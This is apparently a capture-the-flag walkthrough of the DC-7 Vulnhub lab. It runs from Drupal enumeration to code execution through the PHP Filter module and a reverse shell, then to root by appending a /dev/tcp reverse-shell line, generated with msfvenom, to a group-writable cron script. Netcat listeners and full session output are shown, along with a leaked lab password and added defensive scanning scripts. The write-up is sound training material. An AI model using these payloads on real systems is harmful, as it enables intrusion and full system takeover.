
This is the DC:7 Vulnhub walkthrough. There are many VMs to choose from on vulnhub.com, so it can be a daunting task to pick one. Studying for the OSCP exam narrows the criteria for a favorable practice VM even further. For those who don’t know already, you are prohibited from using Metasploit during the exam except against one host, so it is a good idea to practice not needing it.

Woah woah DC 7, haven’t done DC 1 yet? Read the tutorial DC-1 Vulnhub Walkthrough: Docker & Drupal now!

Given these criteria you can narrow the search down a bit, but VMs recommended by experienced ethical hackers are still your best bet. The DC 7 VM is one of a series, starting with DC 1. In my opinion this VM is great for learning and practicing Linux privilege escalation. Enjoy!

Here’s What You Need

Exploit Toolbelt

  • https://github.com/alem0lars/docker-droopescan

Privilege Escalation Toolbelt

  • https://github.com/rebootuser/LinEnum
  • https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

DC:7 Vulnhub Walkthrough

Enumeration

My first pass at enumeration is done with AutoRecon and nmap. The results identify a few running services. A look at the web service shows that Drupal, the CMS software, is running. Drupal holds only a small portion of the CMS market share, but it is commonly used to demonstrate web exploitation techniques.

To scan the Drupal site I use droopescan. I prefer to use the dockerized container version of droopescan.

DC:7 Vulnhub Walkthrough

To install droopescan follow these steps below.

git clone https://github.com/droope/droopescan.git
cd droopescan

# restart the docker service
service docker restart

# build and tag the image as droope/droopescan
docker build -t droope/droopescan .

# scan the target
docker run --rm droope/droopescan scan drupal -u http://10.0.0.187
[+] Possible version(s):
    8.7.0
    8.7.0-alpha1
    8.7.0-alpha2
    8.7.0-beta1
    8.7.0-beta2
    8.7.0-rc1
    8.7.1
    8.7.2
    8.7.3

[+] Possible interesting urls found:
    Default admin - http://10.0.0.187/user/login

I go ahead and try the exploit I used before against the Drupal instance in DC 2, but it fails. That makes sense: droopescan reports Drupal 8.7.x here, while 34992.py targets Drupal 7.

python 34992.py -t http://10.0.0.187 -u guru -p password
NOT VULNERABLE :(

Have a look at the Twitter page for DC7-User.

There it is, a GitHub repo. Perfect.

The text at the end of the page says @DC7USER, finally a clue! Looking at the Twitter page of DC7USER (https://twitter.com/dc7user?lang=en) I see there is a link to a GitHub profile, which must be investigated further. There is only one repository, and as many know, CMS exploits commonly rely on credentials stored in config.php files. This is the case for DC7: there is a username and password stored in cleartext. Great!
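The leak that hands over the SSH login below is a cleartext password committed to a public repository. As an added example (my code, not the post author’s), here is a small shell check a defender can run over a working tree before pushing. It assumes credentials appear as PHP-style assignments such as 'password' => '...' or $password = '...'; the config.php it scans is constructed, with a made-up value.

```bash
#!/usr/bin/env bash
# Added example (not the post author's code): a pre-push check for cleartext
# credentials in CMS configuration files, the mistake that exposed the DC-7
# SSH login. Assumption (mine): credentials appear as PHP-style assignments,
# either 'password' => '...' in an array or $password = '...' as a variable.

# Print "<file>:<line>:<text>" for every line that assigns a non-empty quoted
# literal to a key named password, passwd, pass or secret (case-insensitive).
find_cleartext_credentials() {
  grep -rniE "(password|passwd|pass|secret)['\"]?[[:space:]]*(=>|=|:)[[:space:]]*['\"][^'\"]+['\"]" "$1" 2>/dev/null | sort
}

# Demo on constructed files: a config.php with a literal password (made-up
# value) and a config.safe.php that reads the same settings from the
# environment, which the check must not flag. Prints "<file>:<line>" with the
# temporary directory stripped.
run_demo() {
  local dir
  dir=$(mktemp -d)
  cat > "$dir/config.php" <<'EOF'
<?php
$databases['default']['default'] = array(
  'database' => 'drupal',
  'username' => 'dc7user',
  'password' => 'EXAMPLE-NOT-A-REAL-PASSWORD',
  'host' => 'localhost',
);
EOF
  cat > "$dir/config.safe.php" <<'EOF'
<?php
$databases['default']['default'] = array(
  'database' => 'drupal',
  'username' => getenv('DB_USER'),
  'password' => getenv('DB_PASS'),
  'host' => 'localhost',
);
EOF
  find_cleartext_credentials "$dir" | cut -d: -f1,2 | sed "s#^$dir/##"
  rm -rf "$dir"
}

run_demo
```

Run it as a pre-commit or CI step over the repository root; the safe variant shows the fix, which is to load secrets from the environment (or a file outside version control) instead of committing them.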

DC:7 Vulnhub Walkthrough – SSH

Bingo: dc7user : MdR3xOgB7#dW. Hide your passwords, folks!

Remember that the running services are ssh and http.

# ssh to DC 7 as the newly found user - dc7user : MdR3xOgB7#dW
ssh dc7user@10.0.0.187

So I have a username and a password; what to do with them now?

Logging into the box as dc7user, I take a look around and notice the permissions in the directory listing. One file, named mbox, is readable and writable by all users.


So I cat the contents of mbox and discover system mail with some interesting contents. It looks like mail about a cron job that has run. There is always the possibility of abusing a cron job for privilege escalation, so I explore further.


The contents of the backups.sh file show some commands that have run, the most interesting of which is drush.


DC:7 Vulnhub Walkthrough – Drush

A Google search shows that drush is a command-line utility for Drupal, and that it can be used to change the administrator password. Nice!

drush user-password admin --password=password
listing the contents of the backups.sh script to discover exploitable elements

So I now log in as admin with the password “password” and guess what? It works.

Just as WordPress is commonly exploited by running PHP code on the web server, so too is the case here. The one difference with Drupal is that an extra step is required: to allow PHP in page content to execute you have to install the PHP Filter module.

Go to drupal.org/project/php to get the tar.gz file for the module and then upload the file on the Drupal site as admin.

installing the tar.gz file for the php module to exploit the Drupal site

A successful installation will display an update on authorize.php. Now follow the link to enable newly added modules.

php module installed correctly get ready to exploit the site

Tick the checkbox to the left of the PHP Filter module, which you will find by scrolling towards the end of the page.

Make sure to hit the Install button at the end of the page. Successfully installing the new module redirects to a new page with a success message.

Module PHP Filter has been enabled.

The next step is to embed the code for a reverse shell in the Drupal site by creating a new page and previewing in the web interface.

Content > Add content > Basic page > Save as PHP Code format

new basic page created Drush exploited to create new php embedded shell page

The web shell I am using is the one from pentestmonkey.com, which is conveniently located by default in Kali Linux at /usr/share/webshells/php-reverse-shell.php; use this one as well.


Choosing the Preview button executes the embedded PHP code. With a netcat listener open on the port we defined in the PHP web shell one step ago, a new shell is opened!


Linux Privilege Escalation

With a shell now on the box I need to do one thing: escalate privileges to root. But first things first, let’s improve the shell I already have by upgrading to a Python TTY (teletypewriter) shell.

python -c 'import pty; pty.spawn("/bin/bash")'  

One possible avenue we could explore is a kernel exploit. However, researching exploits for this kernel version turns up nothing useful, so I will proceed down a different route.

uname -a
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux

This information is confirmed by the two enumeration scripts I run.

# kernel info is confirmed by linenum.sh output
### SYSTEM ##############################################
[-] Kernel information:
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux

At this point I realize I need to actually power off my Kali Linux VM and add a Bridged or NAT network adapter. Once I do that I can easily get the connection to work.

The first script is lse.sh, or “linux smart enumeration”.

wget http://10.0.0.44:8000/lse.sh

And LinEnum.

wget http://10.0.0.44:8000/linenum.sh

root@kali:~# nc -lvp 443
listening on [any] 443 ...
10.0.0.187: inverse host lookup failed: Unknown host
connect to [10.0.0.44] from (UNKNOWN) [10.0.0.187] 59834
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
 08:14:07 up 6 min,  0 users,  load average: 0.09, 0.08, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'      
www-data@dc-7:/$ whoami
whoami
www-data
www-data@dc-7:/$ sudo -l
sudo -l
bash: sudo: command not found
www-data@dc-7:/$ ps | grep root
ps | grep root
www-data@dc-7:/$ ps              
ps
  PID TTY          TIME CMD
  834 pts/0    00:00:00 bash
  839 pts/0    00:00:00 ps
www-data@dc-7:/$ ls
ls
bin   etc	  initrd.img.old  lost+found  opt   run   sys  var
boot  home	  lib		  media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64		  mnt	      root  srv   usr  vmlinuz.old
www-data@dc-7:/$ wget http://10.0.0.44/linenum.sh
wget http://10.0.0.44/linenum.sh
--2019-09-21 08:18:14--  http://10.0.0.44/linenum.sh
Connecting to 10.0.0.44:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45652 (45K) [text/x-sh]
linenum.sh: Permission denied

Cannot write to 'linenum.sh' (Permission denied).
www-data@dc-7:/$ cd /tmp/var
cd /tmp/var
bash: cd: /tmp/var: No such file or directory
www-data@dc-7:/$ cd /var/tmp
cd /var/tmp
www-data@dc-7:/var/tmp$ wget http://10.0.0.44/linenum.sh
wget http://10.0.0.44/linenum.sh
--2019-09-21 08:18:30--  http://10.0.0.44/linenum.sh
Connecting to 10.0.0.44:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: 'linenum.sh'

linenum.sh          100%[===================>]  44.58K  --.-KB/s    in 0s      

2019-09-21 08:18:31 (93.7 MB/s) - 'linenum.sh' saved [45652/45652]

www-data@dc-7:/var/tmp$ chmod u+x linenum.sh
chmod u+x linenum.sh
www-data@dc-7:/var/tmp$ ./linenum.sh

None of the SUID files are exploitable, unfortunately.

[-] SUID files:
-rwsr-xr-x 1 root root 40536 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 61240 Nov 10  2016 /bin/ping
-rwsr-xr-x 1 root root 31720 Mar  8  2018 /bin/umount
-rwsr-xr-x 1 root root 44304 Mar  8  2018 /bin/mount
-rwsr-xr-x 1 root root 1019656 Jul 20 21:32 /usr/sbin/exim4
-rwsr-xr-x 1 root root 440728 Mar  2  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Jun 10 07:42 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 59680 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40504 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 75792 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 50040 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 40312 May 17  2017 /usr/bin/newgrp

Enumeration is key! That is why, just for fun, I also run lse.sh, the smart enumeration script, to see what else we can find out about the box.

www-data@dc-7:/var/tmp$ ./lse.sh
./lse.sh
---
If you know the current user password, write it here for better results: www-data
www-data
---

        User: www-data
     User ID: 33
    Password: ******
        Home: /var/www
        Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
       umask: 0000

    Hostname: dc-7
       Linux: 4.9.0-9-amd64
Distribution: Debian GNU/Linux 9.9 (stretch)
Architecture: x86_64

==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in an administrative groups?.............. nope
[*] usr030 Other users with shell.......................................... yes!
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[!] sud020 Can we sudo with a password?.................................... nope
[!] sud030 Can we list sudo commands with a password?...................... nope
[*] sud040 Can we read /etc/sudoers?....................................... nope
[*] sud050 Do we know if any other users used sudo?........................ nope
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. nope
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ nope
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... yes!
[*] fst090 SSH files in home directories................................... nope
[*] fst100 Useful binaries................................................. yes!
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'www-data' have mail?...................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[i] fst500 Files owned by user 'www-data'.................................. skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... nope
[!] sys030 Can we read /etc/shadow file?................................... nope
[!] sys030 Can we read /etc/shadow- file?.................................. nope
[!] sys030 Can we read /etc/shadow~ file?.................................. nope
[!] sys030 Can we read /etc/master.passwd file?............................ nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... nope
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[!] ret050 Can we write to executable paths present in cron jobs........... skip
[*] ret060 Can we write to any paths present in cron jobs.................. skip
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... skip
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Namerservers.................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. skip
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... skip
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
==============================================================( processes )=====
[!] pro000 Can we write in any process binary?............................. nope
[*] pro010 Processes running with root permissions......................... yes!
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
[!] sof040 Found any .htpasswd files?...................................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope

==================================( FINISHED )==================================

The output of the two Linux privilege escalation scripts is useful but ultimately fruitless. Looking back at the findings from the initial enumeration, it is time once again to look at the backups.sh script for help. Let’s check the ownership and permissions of that file. It turns out it belongs to root, but its group is www-data and the group write bit is set, so the www-data user we are running as can modify a script that root executes.

www-data@dc-7:/var/tmp$ cd /opt
cd /opt
www-data@dc-7:/opt$ cd scripts
cd scripts
www-data@dc-7:/opt/scripts$ ls
ls
backups.sh
www-data@dc-7:/opt/scripts$ ls -al
ls -al
total 12
drwxr-xr-x 2 root www-data 4096 Aug 29 23:02 .
drwxr-xr-x 3 root root     4096 Aug 29 13:59 ..
-rwxrwxr-x 1 root www-data  520 Aug 29 23:02 backups.sh
www-data@dc-7:/opt/scripts$ 

So at this point we need to generate some bash code to execute yet another reverse shell. In this way we abuse the permissions of the backups.sh script in order to escalate to root. Since the script is executed by a root cron job (the source of the mail in mbox), whatever we append to it will run as root on the next run.

From redteamtutorials.com – Bash Unix Reverse Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh

root@kali:~# msfvenom -p cmd/unix/reverse_bash LHOST=10.0.0.44 LPORT=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 63 bytes
0<&198-;exec 198<>/dev/tcp/10.0.0.44/4444;sh <&198 >&198 2>&198

To reiterate, we are appending bash code to the existing backups.sh script so that, when the cron job next runs it, a new reverse shell connection is spawned.

echo "0<&198-;exec 198<>/dev/tcp/10.0.0.44/4444;sh <&198 >&198 2>&198" >> backups.sh
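The weakness exploited in the last two steps is a script that root runs from cron but that the www-data group can write to, and the tampering is an appended /dev/tcp line. The following shell script is an added example (mine, not from the walkthrough or the DC-7 author) of the checks a defender would run on such scripts: a permission audit, an integrity comparison against a sha256sum baseline, and a content scan for reverse-shell patterns. It assumes the scripts live under a directory passed as an argument and that a baseline file in sha256sum format exists; the demo files it creates are constructed, and the appended line uses the documentation address 192.0.2.10.

```bash
#!/usr/bin/env bash
# Added example (not code from the walkthrough): defender-side checks for a
# cron script that root runs but that a low-privileged user can modify.
# Assumptions (mine): the scripts to audit live under the directory passed as
# $1, and a baseline of "<sha256>  <absolute path>" lines exists for them.

# 1. Permission audit: regular files whose group or other write bit is set.
#    -perm -020 is group-writable, -perm -002 is world-writable (POSIX find).
#    On DC-7 backups.sh was -rwxrwxr-x root www-data, which this flags.
find_writable_scripts() {
  find "$1" -type f \( -perm -020 -o -perm -002 \) | sort
}

# 2. Integrity check: paths from the baseline whose content no longer matches.
#    sha256sum -c prints "<path>: FAILED" for every mismatch; keep the path.
find_modified_scripts() {
  sha256sum -c "$1" 2>/dev/null | sed -n 's/: FAILED.*$//p' | sort
}

# 3. Content scan: lines that look like a shell-based reverse connection,
#    covering the /dev/tcp trick used above, netcat with -e, and the classic
#    "bash -i >& /dev/tcp/..." form. Output is "<path>:<line>:<text>".
find_reverse_shell_lines() {
  grep -rnE '/dev/tcp/|nc[[:space:]].*-e[[:space:]]|bash -i[[:space:]]*>&' "$1" 2>/dev/null | sort
}

# Demo on constructed files: a group-writable backups.sh (mode 775, as on
# DC-7) next to a correctly permissioned safe.sh (mode 755). A baseline is
# taken, then a reverse-shell line is appended to backups.sh the way the
# walkthrough does it (192.0.2.10 is a documentation address, not a real host).
run_demo() {
  local dir baseline
  dir=$(mktemp -d)
  baseline=$(mktemp)

  printf '#!/bin/bash\ncp -r /var/www/html /backups\n' > "$dir/backups.sh"
  printf '#!/bin/bash\nlogrotate /etc/logrotate.conf\n' > "$dir/safe.sh"
  chmod 775 "$dir/backups.sh"
  chmod 755 "$dir/safe.sh"
  sha256sum "$dir/backups.sh" "$dir/safe.sh" > "$baseline"

  echo 'exec 198<>/dev/tcp/192.0.2.10/4444;sh <&198 >&198 2>&198' >> "$dir/backups.sh"

  # Report base names only, one category per line.
  echo "writable=$(find_writable_scripts "$dir" | sed 's#.*/##' | tr '\n' ' ' | sed 's/ $//')"
  echo "modified=$(find_modified_scripts "$baseline" | sed 's#.*/##' | tr '\n' ' ' | sed 's/ $//')"
  echo "suspicious=$(find_reverse_shell_lines "$dir" | cut -d: -f1 | sort -u | sed 's#.*/##' | tr '\n' ' ' | sed 's/ $//')"

  rm -rf "$dir" "$baseline"
}

run_demo
```

Each of the three checks would have caught the DC-7 chain at a different point: the permission audit before any attacker arrived (the fix is chmod 755 and root:root ownership on anything cron runs as root), the baseline comparison right after the append, and the content scan even without a baseline.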

Now I can paste the full command into my original reverse shell (from the /opt/scripts directory), start a listener on port 4444 and wait for the cron job to run, which reaps our next shell.

nc -lvp 4444
listening on [any] 4444 ...
10.0.0.187: inverse host lookup failed: Unknown host
connect to [10.0.0.44] from (UNKNOWN) [10.0.0.187] 54214
python -c 'import pty; pty.spawn("/bin/bash")'  
root@dc-7:/var/www# whoami
whoami
root
root@dc-7:/var/www# cd /root
cd /root
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt	
cat theflag.txt

Pretty standard here: read the final flag and you’re done!

root flag captured

And there you have it, that’s the DC 7 Vulnhub walkthrough.
